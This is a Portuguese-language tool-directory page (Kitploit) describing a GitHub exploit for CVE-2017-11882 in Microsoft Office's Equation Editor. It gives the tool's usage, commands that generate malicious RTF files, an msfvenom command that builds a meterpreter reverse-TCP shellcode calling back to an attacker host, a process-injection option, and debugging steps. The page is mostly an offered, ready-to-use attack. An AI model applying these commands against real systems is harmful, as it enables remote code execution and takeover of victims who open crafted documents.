Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-11882 — O exploit CVE-2017-11882 aceita comandos/códigos com mais de 17k bytes no máximo. | Kitploit
Ferramentas/GitHubGitHub/rip1s/cve-2017-11882
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoExploração de Binários
GitHubrip1s/cve-2017-11882

CVE-2017-11882

O exploit CVE-2017-11882 aceita comandos/códigos com mais de 17k bytes no máximo.

Ver Repositório
33092há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-11882 Exploit

O exploit CVE-2017-11882 aceita comandos/códigos com comprimento máximo superior a 17k bytes.

Para execução remota de comandos, este exploit chamará WinExec com SW_HIDE e chamará ExitProcess após o WinExec retornar.

Para execução remota de código, este exploit apenas faz jmp para o código.

Não consegui encontrar uma referência para a estrutura do objeto... então não posso alterar o tamanho do arquivo para execução de código de tamanho arbitrário..:(

Mas acho que 17k bytes é realmente suficiente. O script Python detectará o tamanho do payload necessário e escolherá o template de payload correto.

Atenção: RCE travará o processo winword se você não migrar para outro processo!

Atualmente, este exploit injetará seu shellcode em um novo processo EQNEDT32.EXE se você especificar a flag -i. Esta operação é suspeita para o AV, mas não travará o processo do Word.

Uso

root@kitploit:~
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT

Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)

optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf

Exemplo:

Para execução remota de comandos

root@kitploit:~
CVE-2017-11882.py -c cmd.exe -o test.rtf

Para execução remota de código

  1. Gere um shellcode
root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
  1. Gere o exploit
root@kitploit:~
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf

Depuração

  1. Defina o valor do depurador para o caminho do seu depurador em HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE

  2. Crie um exploit e execute-o.

  3. Defina um ponto de interrupção em 0x41165f

  4. Este ponto de interrupção será atingido duas vezes; na segunda vez, o payload será executado após o retorno desta função.

Referências

  1. https://github.com/embedi/CVE-2017-11882
  2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
  3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
Baixar ferramenta